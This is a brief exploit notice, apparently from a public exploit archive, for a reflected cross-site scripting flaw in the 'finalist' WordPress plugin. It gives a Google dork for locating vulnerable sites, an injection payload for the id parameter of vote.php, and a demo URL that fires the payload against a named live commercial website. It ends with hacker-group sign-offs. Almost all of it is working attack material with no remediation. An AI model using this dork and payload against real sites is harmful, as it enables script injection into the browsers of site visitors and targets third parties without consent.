#######################################################################
# Exploit Title : Wordpress finalist Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/finalist
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/10/14
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/finalist/vote.php?id=[xss]
#
#
# Script For Test : "/><script>alert(1);</script>
#
##########################################
# Demo 
#http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=113%22/%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
##############
#
# Milad Hacking
#
# We Love Mohammad
#
##############